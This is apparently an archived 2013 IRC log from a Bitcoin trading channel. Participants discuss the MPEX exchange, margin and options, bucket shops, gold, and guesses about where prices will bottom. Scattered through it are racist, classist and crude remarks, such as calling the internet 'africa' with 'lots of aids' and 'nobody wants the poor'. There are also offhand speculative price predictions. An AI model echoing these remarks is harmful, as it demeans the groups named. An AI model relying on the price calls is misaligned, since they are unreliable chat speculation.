sophisticated discussion of BTC assets get more widespread. This channel is the best their is but cuts off half the population. Apr 15 15:05:45 sdice valuation was betting volume related Apr 15 15:05:47 why would price movement worry u Apr 15 15:05:59 Bugpowder maybe, yeah. Apr 15 15:06:12 at .0075 it was undervalued Apr 15 15:06:18 taub because volatility and investment are roughly speaking inversely correlated. Apr 15 15:06:27 when 20,000BTC profit per month Apr 15 15:06:47 never heard that before mp Apr 15 15:06:56 let me illustrate this point, and i won't even use tits. Apr 15 15:06:59 i mean your job should be to run the exchange, not really worry about volatility Apr 15 15:07:03 S.DICE moves like a biotech Apr 15 15:07:08 consider a town, and consider the mob moves in. Apr 15 15:07:20 now, with the mob there comes sudden and striong social mobility, and also a bunch of murders. Apr 15 15:07:39 in spite of it being mostly the mobsters who are getting murdered, it is the peasants who move out of the town, and the mobsters who move in. Apr 15 15:07:51 I respect the math/investment opinions, so I'm not going anywhere. I could just do without you playing to the mentality of teenage boys while you simultaneously express distaste for unsophisticated noobs (a high proportion of which are likely that same demographic). Apr 15 15:07:53 huge volatility is exactly the same : in spite of the fact it mostly burns the speculators, Apr 15 15:08:02 it is the investors it repels and the speculators it attracts. Apr 15 15:08:31 unbalanced_ the sexual barrier is there to repel the unthinking adults, not to cater to the teenagers. Apr 15 15:09:03 grosso modo if you're spending any part of your day in a place where you can't peruse porn you don't belong here anyway. Apr 15 15:09:07 Anywhoo, I'm saying I agree that MPEX is the biggest and the best game in town. I'd like more people to know about it and I think the site is not just unattractive, it prevents people from taking it seriously. Apr 15 15:09:22 unbalanced_ why do you think that ? Apr 15 15:09:55 [MPEX] [S.MPOE] 3000 @ 0.00069476 = 2.0843 BTC [-] Apr 15 15:10:02 the public should be going to coinbr - not MPEX Apr 15 15:10:15 Bugpowder i think perhaps you have a good point there, it does move like a biotech Apr 15 15:10:26 maybe i'm overstating my herd concerns as personal bias. Apr 15 15:10:54 Oh look a whale is betting again with a big address = positive clinical trial result Apr 15 15:11:15 or fda comment or w/e. Apr 15 15:11:20 yah Apr 15 15:11:26 As a motivated options trader actively looking for a solution to trade options on Bitcoin, it took me about a year and umpteen visits to mpex.co to grok it and get over the 1995 layout and titties and harsh attitude. Apr 15 15:11:28 i was thinking more like irl mining Apr 15 15:11:31 but it's all the same Apr 15 15:11:32 I totally respect the tech tho Apr 15 15:11:43 It's elegant, and well done. Apr 15 15:11:52 It's revenue stream is very very top heavy Apr 15 15:12:02 just like a biotech Apr 15 15:12:13 or a gold mine etc. Apr 15 15:12:30 oh gold… 1400? Apr 15 15:12:34 yeah. Apr 15 15:12:41 hmm Apr 15 15:12:42 this in spite of the utah mine collapse. Apr 15 15:12:49 i think they;'ve sold the cyprus gold on the market. Apr 15 15:12:51 yah I saw that pic Apr 15 15:12:57 I hate seeing these articles now where people are discussing plans for trading options on bitcoin and MPEX isn't even mentioned. That's all I'm getting at, let's get them to notice what you've built here. Apr 15 15:13:03 where do you think the bottom? Apr 15 15:13:05 probably the best tiem to buy gold this year Apr 15 15:13:16 unbalanced_ what articles be those ? Apr 15 15:13:23 if it break 1350, look out below.. Apr 15 15:13:36 pgp it's funny but i think gold is doing a bitcoin. Apr 15 15:14:34 lol Apr 15 15:15:44 overtime, bticoin will get some of the money that people would otherwise invest in gold... Apr 15 15:15:50 obviously Apr 15 15:15:59 fed shorting gold Apr 15 15:16:14 i think over time it will get most. Apr 15 15:17:17 anyway, unbalanced_, people (like for instance MtGox) were discussing plans to trade options on bitcoins back this time in 2011, and mpex wasn't even mentioned. Apr 15 15:17:37 if it were something anyone could do i wouldn't even have bothered doing it myself. Apr 15 15:17:50 the barrier to entry however is a lot higher than getting a bunch of people talking. Apr 15 15:17:57 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [+] Apr 15 15:19:03 [HAVELOCK] [SDICE] 3 @ 0.36500015 = 1.095 BTC [+] Apr 15 15:19:26 mircea_popescu: finally found a link: http://siliconangle.com/blog/2013/04/11/coinsetter-the-newest-bitcoin-forex-seeks-a-niche-in-the-wild-market/ Apr 15 15:19:28 "The New-York based startup seeks to bring to market advanced trading options that don’t exist in the current BTC market." Apr 15 15:20:02 [HAVELOCK] [SDICE] 2 @ 0.36500014 = 0.73 BTC [-] Apr 15 15:20:03 options part is super easy Apr 15 15:20:16 margin, on the other hand is super hard Apr 15 15:20:18 Coinsetter may never pull it off, they could be full of fail. Apr 15 15:20:28 because you need cover collateral for slippage Apr 15 15:20:31 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 15 15:20:33 margin calls are not 100% Apr 15 15:20:36 Meanwhile I think we'd all benefit from more liquidity and participants in MPEX. Apr 15 15:21:14 how do i margin trade on mpex? Apr 15 15:21:30 mpex needs more users so it can start offering more competitive option prices Apr 15 15:21:34 I just want to broaden the base of MPEX users, I don't mean to be trollin'. Apr 15 15:21:38 right now it's lacking stupid investors Apr 15 15:21:54 thats why mp has to set option prices so high Apr 15 15:22:03 anyone can issue options Apr 15 15:22:11 yea but nobody really bothers Apr 15 15:22:12 as long they have capital to back it Apr 15 15:22:15 except mp Apr 15 15:22:28 and partly because of lack of users i'd imagine Apr 15 15:22:51 taub: anyone except the exchange should issue options i think :) Apr 15 15:23:50 in the long run, i think traditional forex instruments are not really aplicable to bitcoin Apr 15 15:23:50 a lot of talk from coinsetter Apr 15 15:24:07 and some new ones will have to be invented Apr 15 15:24:13 how will it not just turn into a bucket shop Apr 15 15:24:20 especially with the margin trading Apr 15 15:24:27 yeah Apr 15 15:24:42 wouldn't that be the most profitable enterprise? Apr 15 15:24:49 bucket shop is legit Apr 15 15:24:52 IF youre transparent Apr 15 15:24:56 the thing about the higher progile companies in america is that they need to be mindful of likely regulation. Apr 15 15:24:59 if you have "magical unicorn engine" Apr 15 15:25:03 thats totally not transparent Apr 15 15:25:04 you have a good point Apr 15 15:25:27 coinsetter puts out all these press relesses about margin lending, which by the way, isn't rocket science... Apr 15 15:25:35 some people think bucket shops are bad because it has no impact on actual market Apr 15 15:25:38 wrong Apr 15 15:25:43 people will try to manipulate price on mtgox Apr 15 15:25:49 in favor of their option bets :) Apr 15 15:25:53 but I'm not sure how they'll get around usuary laws in US... Apr 15 15:25:57 i'm not sure if it IS a buckt shop Apr 15 15:26:01 or just an actual exchange Apr 15 15:26:05 max rate you can charge is 24% Apr 15 15:26:15 margin goes for 10x that on bitfinex Apr 15 15:26:17 real trading runs on margin as well and isn't a bucketshop Apr 15 15:26:21 taub: bucket shop means youre using spot price of different exchange than your own Apr 15 15:26:22 i kinda think if your position is large enough (on margin) and coinsetter can take advantage of it, it will Apr 15 15:26:32 i konw ezdiy Apr 15 15:26:45 is that what coinsetter wants to do? Apr 15 15:26:51 no idea Apr 15 15:26:54 but mebbe thasa goos thing Apr 15 15:26:58 there are strong laws in US against bucket shops Apr 15 15:27:00 so i doubt it Apr 15 15:27:04 they'll most likely run full exchange Apr 15 15:27:04 ah Apr 15 15:27:10 I thought this was about coinsetter ;) Apr 15 15:27:27 (mpex is actually a bucket shop btw :) Apr 15 15:27:28 unbalanced_ well... so silicon angle doesn't do research. i had no idea they existed. Apr 15 15:27:34 hahaha Apr 15 15:27:47 that piece looks like it cost a hundred bux. im not quite into giving obscure venues money for this "service" yet. Apr 15 15:27:48 though i think bucket shops are legit in .ro so no issue here Apr 15 15:28:06 running a full exchange in US is a risky proposition, in my view Apr 15 15:28:09 how do i margin trade on mpex? << you apply for it. Apr 15 15:28:20 you get it if you are high volume and trustworthy. Apr 15 15:28:26 as well as acting as a broker to public Apr 15 15:28:40 free pokemon credits for everyone! Apr 15 15:28:47 mircea_popescu: does not sound too open Apr 15 15:28:55 bucket shop is legit << mno. Apr 15 15:29:15 mircea_popescu: but i guess you have a liquidity problem so you cant force liquidate positions Apr 15 15:29:20 due to enormous slippage Apr 15 15:29:55 pgp people like coinsetter are part of a lengthy tradition of dunning-kruger. the controlling example is one kludge, an out of work bank clerk who figured himself a banker Apr 15 15:29:57 lost the house. Apr 15 15:29:59 either way, you dont need trust to margin trade Apr 15 15:30:14 just enough liquidity to have working margin calls Apr 15 15:30:19 ezdiy no, it's designed specifically to keep people like you out actually. Apr 15 15:30:39 huh? Apr 15 15:30:42 you read me. Apr 15 15:30:45 ezdiy: yes Apr 15 15:30:59 clueless internet warriors who have definitive answers to things they read on wikipedia. i don't want to empower you folks. Apr 15 15:31:02 you cock things up. Apr 15 15:31:09 hehe Apr 15 15:31:36 go get in the wot, spend a year or more making sense, trade many many thousands of btc on mpex Apr 15 15:31:40 then maybe i'll margin you. Apr 15 15:32:08 i see Apr 15 15:32:19 http://www.nytimes.com/2012/01/15/opinion/sunday/the-rise-of-the-new-groupthink.html Apr 15 15:32:20 basically margin trading is loans Apr 15 15:32:29 loans are basically gifts Apr 15 15:32:32 in here because there is no other way Apr 15 15:32:36 in bitcoinland Apr 15 15:32:52 jcpham: supposedly not if you wot Apr 15 15:32:58 bullshit Apr 15 15:33:14 wot gets gamed also Apr 15 15:33:33 the people that borrow btc time and time again fail to repay Apr 15 15:33:38 regardless of reputation Apr 15 15:33:58 well, apparently past reputation guarantees future reputation according to mircea_popescu Apr 15 15:34:21 mircea_popescu operates by his own made-up rules Apr 15 15:34:32 everyone is living in walled castles at this point Apr 15 15:35:08 don't loan your coins though for btc-only Apr 15 15:35:13 ezdiy past reputation is the way to go. Apr 15 15:35:18 don't loan your coins Apr 15 15:35:20 you may never see it again. insert fiat clause Apr 15 15:35:23 ever ever ever Apr 15 15:37:17 [MPEX] [S.MPOE] 5300 @ 0.00070473 = 3.7351 BTC [+] Apr 15 15:38:49 jcpham you know for the record i've not yet had problems with margined ppl. Apr 15 15:39:31 probably becuase your elitist attitude keeps away the trash? Apr 15 15:39:41 which is good Apr 15 15:40:18 white trash means liquidity Apr 15 15:40:24 does not. Apr 15 15:40:25 look at mtgox compared to mpex Apr 15 15:40:33 this is not fast food. nobody wants the poor. Apr 15 15:40:39 there's a reason the concept of "underbanked" exists. Apr 15 15:41:18 i bet vetting people with a large fee to play has been successful Apr 15 15:41:21 mircea_popescu: so let me get this straight Apr 15 15:41:22 jcpham if you only deal with peopel who understand the value of reputation you're more likely to survive for sure. Apr 15 15:41:40 consider the situation of a supermarket. if you open one in africa you will have a bunch of shoplifters. Apr 15 15:41:47 if you open one in manhattan nobody's going to bother. Apr 15 15:42:00 did you just call the internet africa? Apr 15 15:42:00 mircea_popescu: if someone gets you 1000BTC, and you'll hold it as a guarantee Apr 15 15:42:07 or is the bitcoin community africa? Apr 15 15:42:10 mircea_popescu: then hes trusted? Apr 15 15:42:13 jcpham the internet largely is africa, yes. Apr 15 15:42:15 ezdiy nope. Apr 15 15:42:26 i can understand the referece Apr 15 15:42:35 lots of aids Apr 15 15:42:39 lol Apr 15 15:43:36 mircea_popescu's margin loans are very different than most BTC loans though, in that it is an accounting that is kept on servers he controls. Thus, the receiver has little opportunity to steal the coins and walk. If you loan coins and that hits the receiver's personal wallet.dat, you are just praying they come back. Apr 15 15:43:51 mircea_popescu: true, in case of 1KBTC i'd have my own doubts regarding your put-call parity :) Apr 15 15:43:58 this is true, mpex margin is quite different from most loan ops. Apr 15 15:44:13 seems like the funds would stay internal Apr 15 15:44:18 ezdiy you know, there have been 10k btc single orders on mpex. Apr 15 15:44:21 anyway to "steal them" Apr 15 15:44:28 blockchain steal? Apr 15 15:44:40 it isn't stolen until the blockchain says fuck you Apr 15 15:44:57 mircea_popescu: I concede. It's rude of me to walk into your house and criticize your wallpaper and the art on the walls. Apr 15 15:44:57 I just wanted MPEX to be more popular, but I get now that a) that Apr 15 15:44:57 is not necessarily a good thing, and Apr 15 15:44:57 b) it's growing exactly as fast as you want it to. If you want it to grow faster or slower, you know what to do better than I. Apr 15 15:44:57 New topic: the bot's option pricing algo. Is that a secret? Does it have to be? Apr 15 15:45:07 unbalanced_ im not offended or anything Apr 15 15:45:13 Rule 23 Apr 15 15:45:13 http://mpex.co/faq.html#23 Apr 15 15:45:21 nah unbalanced_ he likes criticism Apr 15 15:45:28 loves it Apr 15 15:45:44 i don't mind it, especialyl if it makes sense. Apr 15 15:46:03 anyway. the bot's pricing algo is proprietary, yes. i don't see why it wouldn't be. Apr 15 15:46:42 [MPEX] [S.MPOE] 10417 @ 0.0006988 = 7.2794 BTC [-] Apr 15 15:46:46 transparency ftw Apr 15 15:46:48 hello bitcoinica :) Apr 15 15:46:54 Did the algo actually change mid-month, or did the spreads just widen due to volatility, still using the existing algo? Apr 15 15:47:04 the algo didn't change. Apr 15 15:47:10 the bot however went berserk basically. Apr 15 15:47:34 mostly the drop triggered what looks more like safety than actual pricing assumptions Apr 15 15:48:57 anyway, i'd love to stay and chat but i'm due in some meetings. we continue later. Apr 15 16:03:02 [HAVELOCK] [KCIM] 4 @ 1.2139 = 4.8556 BTC [-] Apr 15 16:03:22 ;;next Apr 15 16:03:22 watching for another drop to low 90s, then re-evaluating ask depth and targets | updated by OneFixt at Apr 15 2013, 10:47 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 2 hours, 16 minutes, and 20 seconds ago Apr 15 16:06:56 [MPEX] [S.MPOE] 58 @ 0.00070473 = 0.0409 BTC [+] Apr 15 16:14:02 [HAVELOCK] [VTX] 3 @ 0.485 = 1.455 BTC [+] Apr 15 16:24:35 [MPEX] [S.MPOE] 1250 @ 0.00070788 = 0.8849 BTC [+] Apr 15 16:24:48 [MPEX] [S.MPOE] 4134 @ 0.00070848 = 2.9289 BTC [+] Apr 15 16:24:50 [MPEX] [S.MPOE] 5066 @ 0.00071 = 3.5969 BTC [+] Apr 15 16:29:03 [HAVELOCK] [VTX] 36 @ 0.485 = 17.46 BTC [+] Apr 15 16:30:22 ;;ticker Apr 15 16:30:22 BTCUSD ticker | Best bid: 96.97801, Best ask: 96.99900, Bid-ask spread: 0.02099, Last trade: 96.97801, 24 hour volume: 139162.02515050, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.77353 Apr 15 16:30:26 ;;asks 0 Apr 15 16:30:26 There are currently 0 bitcoins offered at or under 0.0 USD, worth 0.0 USD in total. | Data vintage: 91.0591 seconds Apr 15 16:30:32 ;;bids 0 Apr 15 16:30:32 There are currently 43723736 bitcoins demanded at or over 0.0 USD, worth 14483375.3202 USD in total. | Data vintage: 96.4113 seconds Apr 15 16:30:53 ;;asks 9999999 Apr 15 16:30:53 There are currently 129652.19 bitcoins offered at or under 9999999.0 USD, worth 167037264.711 USD in total. | Data vintage: 117.6040 seconds Apr 15 16:31:09 demand seems an all time high Apr 15 16:31:11 ? Apr 15 16:32:18 i kid :-) Apr 15 16:32:47 [BTCTC] [BTC-BOND] 451 @ 0.01 = 4.51 BTC [+] Apr 15 16:33:39 going up some Apr 15 16:33:42 ;;ticker Apr 15 16:33:42 BTCUSD ticker | Best bid: 97.05008, Best ask: 97.59899, Bid-ask spread: 0.54891, Last trade: 97.05007, 24 hour volume: 139241.84612092, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.77476 Apr 15 16:34:04 [MPEX] [S.MPOE] 5542 @ 0.00070751 = 3.921 BTC [-] Apr 15 16:34:27 http://www.247btc.com/bitcoins/134/how-i-would-manipulate-the-bitcoin-exchange-market-and-how-a-discrete-double-auction-could-stop-me/ Apr 15 16:37:15 bitcoinity looks prettier than usual Apr 15 16:37:26 is that just a simple moving average or a standard deviation? Apr 15 16:40:16 i guess its min/max value Apr 15 16:42:46 yeah, it's the bid/ask range Apr 15 16:46:03 [HAVELOCK] [KCIM] 5 @ 1.2139 = 6.0695 BTC [-] Apr 15 16:56:49 http://scarcecapital.com/hft/about.html Apr 15 16:57:18 jcpham, anyone: Do you think a double auction exchnage as in the 247btc.com link above would get traction? Apr 15 16:57:36 based on what has been hapopening at gox Apr 15 16:57:48 some form of implementation might get a lot of traction Apr 15 17:00:19 [BTCTC] [ASICMINER-PT] 1 @ 0.845 BTC [+] Apr 15 17:00:55 [BTCTC] [ASICMINER-PT] 9 @ 0.855 = 7.695 BTC [+] Apr 15 17:03:04 [MPEX] [S.MPOE] 4700 @ 0.00071 = 3.337 BTC [+] Apr 15 17:05:15 [BTCTC] [ASICMINER-PT] 1 @ 0.855 BTC [+] Apr 15 17:05:48 we believe that not only does high frequency trading not contribute to that purpose, but the way exchanges currently operate leaves the doors open for major manipulation. Apr 15 17:05:51 that's bs Apr 15 17:06:15 hft does contribute, but you can't even hft on any bitcoin exchaneg so i dont know why people keep bitching Apr 15 17:09:48 [MPEX] [S.MPOE] 1150 @ 0.00071 = 0.8165 BTC [+] Apr 15 17:10:14 taub: what made me laugh is that in that "we are mtgox" reddit, a lot of people were like "please block the hft bots" Apr 15 17:10:20 so many clueless idiots Apr 15 17:10:41 apaprently hft is 0.1 trade per second with 400 ms gateway latency now Apr 15 17:11:05 yea... Apr 15 17:11:08 I think it's just semantics to most Apr 15 17:11:15 is it because they read http://www.nanex.net/Research/CQSCap/CQSCap.html ? Apr 15 17:11:19 generally against bots of any kind Apr 15 17:11:37 the actual frequency isn't the issue Apr 15 17:11:56 its pretty evident by now that the gox "engine" does a linear scan of all orders (lol) and that takes around a second Apr 15 17:24:03 [HAVELOCK] [SDICE] 1 @ 0.36500018 BTC [+] Apr 15 17:26:02 [HAVELOCK] [SDICE] 1 @ 0.366 BTC [+] Apr 15 17:44:03 [HAVELOCK] [HIM] 5 @ 1.66 = 8.3 BTC [-] Apr 15 17:46:16 awfully quiet in here... and at mtgox... Apr 15 17:52:18 waiting Apr 15 17:56:41 [MPEX] [S.MPOE] 3600 @ 0.00071 = 2.556 BTC [+] Apr 15 18:11:09 !help Apr 15 18:11:10 List of commands: Apr 15 18:11:11 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Apr 15 18:11:12 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Apr 15 18:11:13 !mp (desc: returns the response from MPEX order) Apr 15 18:11:14 !rules (desc: chan guidelines) {short: !r} Apr 15 18:11:15 !exchanges (desc: lists exchanges and brokers) {short: !e} Apr 15 18:11:27 !exchanges Apr 15 18:11:31 http://images.4chan.org/pol/src/1366037118988.png :D Apr 15 18:11:36 #nohomo Apr 15 18:11:59 !ticker Apr 15 18:12:00 Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? Apr 15 18:12:20 !mpex Apr 15 18:12:37 !ticker mpex Apr 15 18:12:38 Your actions are useless. Apr 15 18:12:42 ^ Apr 15 18:12:44 pos Apr 15 18:13:13 cant anyone just do a simple readable asset ticker? Apr 15 18:13:16 i'll pay Apr 15 18:14:13 ? Apr 15 18:14:16 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Apr 15 18:15:07 I have my spreadsheet tools, should be able to fetch all data you need Apr 15 18:15:17 although the ticket thing ain't that hard to do Apr 15 18:15:28 !ticker MPEX S.DICE Apr 15 18:15:29 [MPEX:S.DICE] 1D: 0.00328066 / 0.00328088 / 0.004 (3177 shares, 10.42 BTC), 7D: 0.0027 / 0.00299526 / 0.00409999 (274814 shares, 823.14 BTC), 30D: 0.0027 / 0.00345678 / 0.005598 (1827298 shares, 6,316.58 BTC) Apr 15 18:15:39 thanks nam Apr 15 18:15:41 i'll check it out Apr 15 18:16:02 !ticker HAVELOCK SDICE Apr 15 18:16:04 [HAVELOCK:SDICE] 1D: 0.36500009 / 0.3928556 / 0.42700000 (18 shares, 7.07140088 BTC), 7D: 0.12500000 / 0.31864108 / 0.42700000 (2182 shares, 695.27483395 BTC), 30D: 0.12500000 / 0.37594388 / 0.56789999 (7613 shares, 2862.06078669 BTC) Apr 15 18:16:11 Easy, just a bit long to use Apr 15 18:16:13 why cant i just type !ticker Mpex and get a list of all the assets Apr 15 18:16:41 because it would put lots of stuff in the chat Apr 15 18:16:44 because that only works for mpex, others could cause a flood ? Apr 15 18:16:46 Use https://bitcointalk.org/index.php?topic=140427.0 Apr 15 18:16:56 okey thanks Apr 15 18:17:09 i don't know why its not featured in #bitcoin-market but okey Apr 15 18:17:28 You can use the formulas to fetch data using the APIs of various exchanges Apr 15 18:17:47 on a google spreadsheet Apr 15 18:17:51 i need to check your site, its been a while :) Apr 15 18:18:04 my site? Which one? Apr 15 18:18:10 with teh alarm Apr 15 18:18:46 http://namcdn.com/btcalarm/ Apr 15 18:23:16 feel like making one for me for .5btc? heh Apr 15 18:24:25 bbs Apr 15 18:26:20 i thought kakobrekla had a ticker service already? Apr 15 18:26:33 [BTCTC] [ASICMINER-PT] 10 @ 0.88 = 8.8 BTC [+] Apr 15 18:26:44 ;;ticker m s.dice Apr 15 18:26:44 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Apr 15 18:26:52 !ticker m s.dice Apr 15 18:26:53 [MPEX:S.DICE] 1D: 0.00328066 / 0.00328088 / 0.004 (3177 shares, 10.42 BTC), 7D: 0.0027 / 0.00299526 / 0.00409999 (274814 shares, 823.14 BTC), 30D: 0.0027 / 0.00345678 / 0.005598 (1827298 shares, 6,316.58 BTC) Apr 15 18:26:59 [BTCTC] [ASICMINER-PT] 1 @ 0.89998 BTC [+] Apr 15 18:28:03 [HAVELOCK] [KCIM] 1 @ 1.2139 BTC [-] Apr 15 18:28:05 heh Apr 15 18:28:12 where mjr_ Apr 15 18:28:20 i checked the website but nothing Apr 15 18:28:22 not sure, that's what someone recommended to me before Apr 15 18:28:51 i need to track my portfolio Apr 15 18:35:16 ;;nethash Apr 15 18:35:18 63165.9465183 Apr 15 18:35:32 ;;estimate Apr 15 18:35:33 Next difficulty estimate | 8898397.1525 based on data since last change | 8824046.14459 based on data for last three days Apr 15 18:41:32 [MPEX] [S.MPOE] 1600 @ 0.00070521 = 1.1283 BTC [-] Apr 15 18:43:10 [BTCTC] [PAJKA.BOND] 1 @ 0.10179 BTC [+] Apr 15 18:43:42 [11:28] i need to track my portfolio Apr 15 18:43:46 Use my darn tools Apr 15 18:44:02 hehe okey Apr 15 18:44:07 link Apr 15 18:44:14 i'll send a tip Apr 15 18:44:14 I linked already Apr 15 18:44:22 ahh check going now Apr 15 18:44:25 [11:16] Use https://bitcointalk.org/index.php?topic=140427.0 Apr 15 18:44:34 oh yeah i was just there Apr 15 18:45:34 Makes something like this: https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Apr 15 18:45:47 BitFunder needs manual updating tho, no API yet Apr 15 18:45:59 and MPEx sharecount too, as there's no API for accounts Apr 15 18:46:10 But prices for MPEx can update live at least Apr 15 18:46:38 [BTCTC] [ASICMINER-PT] 3 @ 0.88 = 2.64 BTC [-] Apr 15 18:46:41 Other than that, it can track BTCT.co, Havelock, BTC address balances Apr 15 18:47:01 and also convert the whole BTC value to USD using MtGox weighted average Apr 15 18:47:04 yeah nam i wanted bf as well :( Apr 15 18:47:06 or whatever Apr 15 18:47:15 yeah, they should have an API soon Apr 15 18:47:32 But anyway, for now it still works nicely for most of a portfolio Apr 15 18:47:41 that's very cool man Apr 15 18:47:52 btc-bond is your asset yeh? Apr 15 18:48:14 yeah Apr 15 18:49:22 volume in mkt is gone... REALLY quiet... Apr 15 18:49:34 yeah Apr 15 18:49:49 demand is gone... but most don't want to sell yet Apr 15 18:50:14 since price doesn't go up, I expect demand from speculators to drop and ones still holding to start selling as prices slowly go down Apr 15 18:50:24 and reach a bottom in a few months Apr 15 18:50:25 going to play with this nam, thanks i'll send you a tip when finished Apr 15 18:50:32 okay Apr 15 18:50:42 yeah... Apr 15 18:51:07 not a good sign... definately further to go down... Apr 15 18:51:10 Namworld: Yep... prices will hover for a few more days Apr 15 18:51:11 I could share the spreadsheet so you have make a copy, BitHub Apr 15 18:51:18 but as people lose hope... down it goes Apr 15 18:51:21 just like last time Apr 15 18:51:30 Bottom at $15-30 Apr 15 18:51:45 prolly Apr 15 18:51:54 I say 10-30 personally Apr 15 18:52:04 I don't see it getting under 15 Apr 15 18:52:05 10 with a rebound possibly Apr 15 18:52:14 for a short while Apr 15 18:52:15 it was really stable at 15 for a long time Apr 15 18:52:19 yeah Apr 15 18:52:21 ~40 for me, but wtf do I know Apr 15 18:52:21 [MPEX] [S.MPOE] 1250 @ 0.0007054 = 0.8818 BTC [+] Apr 15 18:52:30 I'm sad I had most of my BTC value in my portfolio couldn't sell all at the top Apr 15 18:52:37 ;;calc 266/33*2 Apr 15 18:52:37 16.1212121212 Apr 15 18:52:41 still sold 100 at 250 Apr 15 18:52:45 just before crash Apr 15 18:52:47 $32-$35 imo Apr 15 18:53:04 and 100 more at $80 just after MtGox reopened Apr 15 18:53:05 top to bottom of the last crash, scaled for this crash says $16.12 is the bottom. Apr 15 18:53:22 I didn't manage to grab back some low BTCs in the 60s before it bounced back Apr 15 18:53:34 I wanted to resell at 100 Apr 15 18:53:51 Well now I'm sitting out for a few weeks Apr 15 18:53:54 Gold down to $1355. Apr 15 18:54:12 O.o Apr 15 18:54:19 fuck Apr 15 18:54:19 wow, that goes down fast... Apr 15 18:54:37 Silver $23 Apr 15 18:54:41 ... Apr 15 18:55:04 [HAVELOCK] [HIM] 1 @ 1.94 BTC [+] Apr 15 18:55:07 Sold my sprint on the pop this morning @ 7.29 Apr 15 18:55:11 1376 right now Apr 15 18:55:13 was in at 2.53 on that one Apr 15 18:55:32 I just can't think of any asset class that is undervalued right now Apr 15 18:55:41 i agree Apr 15 18:55:42 maybe european stocks and some US realestate Apr 15 18:55:57 FED bubble Apr 15 18:56:17 it will end in tears Apr 15 18:56:18 Krugman bubble Apr 15 18:56:35 It will pop and Krugman will say we didn't print enough Apr 15 18:56:36 krugman is a douche bag Apr 15 18:57:56 you know, i always thought it strange that as a journalist/writer, he won the nobel for economics, which is almost exclusively awarded to academic types... Apr 15 18:58:39 so now he banks on that credential from his left wing bully pulpit and it annoys the crap out of me... Apr 15 18:59:43 http://finance.yahoo.com/echarts?s=VGTSX+Interactive#symbol=vgtsx;range=20070518,20130415;compare=%5Egspc;indicator=volume;charttype=area;crosshair=on;ohlcvalues=0;logscale=off;source=undefined; Apr 15 19:00:11 VGTSX looks undervalued relative to SPY Apr 15 19:00:41 from that chart, perhaps Apr 15 19:01:12 problem is world is slowing down, but apparently US is doing fine... Apr 15 19:02:17 yeah krugman is a retard Apr 15 19:02:56 The growth of the Internet will slow drastically, as the flaw in "Metcalfe's law"–which states that the number of potential connections in a network is proportional to the square of the number of participants–becomes apparent: most people have nothing to say to each other! By 2005 or so, it will become clear that the Internet's impact on the economy has been no greater than the fax Apr 15 19:02:57 machine's. Apr 15 19:03:19 ^^^why he doesn't get bitcoin Apr 15 19:03:33 As the rate of technological change in computing slows, the number of jobs for IT specialists will decelerate, then actually turn down; ten years from now, the phrase information economy will sound silly. Apr 15 19:05:02 [HAVELOCK] [SDICE] 3 @ 0.38579 = 1.1574 BTC [+] Apr 15 19:06:05 Before, people bought locally. Now, they buy more on the web. It shifted customers/services around. And I think mostly consolidated a few large companies, but that's just an impression I have. I'd need data to back it =/ Apr 15 19:06:28 Krugman doesn't know shit, he still belives the broken window fallacy Apr 15 19:06:33 yes Apr 15 19:06:35 so I'm happy he is against bitcoin Apr 15 19:06:46 he hasn't actually done anything much of value...he hasn't produced much Apr 15 19:07:37 he's one of those types who openly says war is good for the economy etc Apr 15 19:08:03 [HAVELOCK] [VTX] 1 @ 0.47 BTC [-] Apr 15 19:12:06 well...we do have north korea just begging for it Apr 15 19:12:14 and there is always iran Apr 15 19:12:25 who doesn't admit that afghanistan is getting old... Apr 15 19:12:29 JK Apr 15 19:13:08 i think alot of people still buy locally Apr 15 19:13:24 but i've noticed when there's a huge dip they'll hit the websites straight away because its quicker Apr 15 19:13:44 better off throwing yourself into the mainstream and charging 20% comissions Apr 15 19:16:28 ;;ticker Apr 15 19:16:29 BTCUSD ticker | Best bid: 95.38000, Best ask: 95.49999, Bid-ask spread: 0.11999, Last trade: 95.38000, 24 hour volume: 140456.92501169, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.65965 Apr 15 19:16:39 [MPEX] [S.MPOE] 4300 @ 0.0007054 = 3.0332 BTC [+] Apr 15 19:23:51 hi Apr 15 19:29:10 [BTCTC] [ASICMINER-PT] 3 @ 0.888 = 2.664 BTC [+] Apr 15 19:29:41 http://www.change.org/petitions/u-s-congress-shut-down-guantanamo-bay-prison-once-and-for-all-2 Apr 15 19:29:48 pls sign Apr 15 19:32:22 ;;ticker Apr 15 19:32:23 BTCUSD ticker | Best bid: 95.22101, Best ask: 95.92000, Bid-ask spread: 0.69899, Last trade: 95.92000, 24 hour volume: 140774.22839093, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.64984 Apr 15 19:32:23 mt gox is like watching paint dry... Apr 15 19:32:33 ;;next Apr 15 19:32:33 watching for another drop to low 90s, then re-evaluating ask depth and targets | updated by OneFixt at Apr 15 2013, 10:47 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 5 hours, 45 minutes, and 30 seconds ago Apr 15 19:33:57 [BTCTC] [ASICMINER-PT] 17 @ 0.888 = 15.096 BTC [+] Apr 15 19:50:54 finally, a little movement Apr 15 19:51:00 shit Apr 15 19:51:10 I did it, dont get too excited Apr 15 19:51:11 it is going to sell off before I can dump the rest of my coins. Apr 15 19:51:22 yep Apr 15 19:51:24 beat you to it Apr 15 19:51:34 sell, sell, sell! Apr 15 19:52:12 markets 